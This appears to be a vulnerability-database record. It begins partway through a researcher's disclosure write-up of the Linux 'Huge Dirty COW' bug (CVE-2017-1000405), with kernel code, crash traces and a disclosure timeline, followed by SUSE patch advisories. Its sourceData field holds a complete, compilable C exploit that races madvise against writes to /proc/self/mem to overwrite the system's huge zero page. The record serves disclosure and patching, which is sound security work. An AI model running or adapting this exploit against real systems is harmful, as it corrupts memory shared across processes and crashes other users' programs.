A matching function called `can_follow_write_pmd` was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is straightforward\u200a\u2014\u200awe can use a similar pattern to the original Dirty COW race. This time, after we get rid of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. 
The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. 
This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? 
() from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, 
element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) 
at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 
<captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. 
The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n 
lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] 
Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] 
Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_3 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:13:56", "published": "2017-12-14T21:13:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00063.html", "id": "SUSE-SU-2017:3319-1", "title": "Security update for the Linux Kernel (Live Patch 1 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-92_45 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:09:20", "published": "2017-12-14T15:09:20", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00032.html", "id": "SUSE-SU-2017:3285-1", "title": "Security update for the Linux Kernel (Live Patch 14 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_35 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:16:46", "published": "2017-12-14T15:16:46", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00041.html", "id": "SUSE-SU-2017:3295-1", "title": "Security update for the Linux Kernel (Live Patch 12 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:18:39", "published": "2017-12-14T15:18:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00043.html", "id": "SUSE-SU-2017:3297-1", "title": "Security update for the Linux Kernel (Live Patch 13 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:08:45", "published": "2017-12-06T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00011.html", "id": "SUSE-SU-2017:3225-1", "title": "Security update for the Linux Kernel (important)", "type": 
"suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-06T23:10:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000405: A bug in the THP CoW support could be used by local\n attackers to corrupt memory of other processes and cause them to crash\n (bnc#1069496).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\n The following non-security bugs were fixed:\n\n Fix a build issue on ppc64le systems (bsc#1070805)\n\n", "edition": 1, "modified": "2017-12-06T21:09:39", "published": "2017-12-06T21:09:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00012.html", "id": "SUSE-SU-2017:3226-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.90-6_12 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n", "edition": 1, "modified": "2017-12-14T21:12:53", "published": "2017-12-14T21:12:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00061.html", "id": "SUSE-SU-2017:3317-1", "title": "Security update for the Linux Kernel (Live Patch 4 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_32 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:08:28", "published": "2017-12-14T15:08:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00031.html", "id": "SUSE-SU-2017:3284-1", "title": "Security update for the Linux Kernel (Live Patch 11 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.82-6_9 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
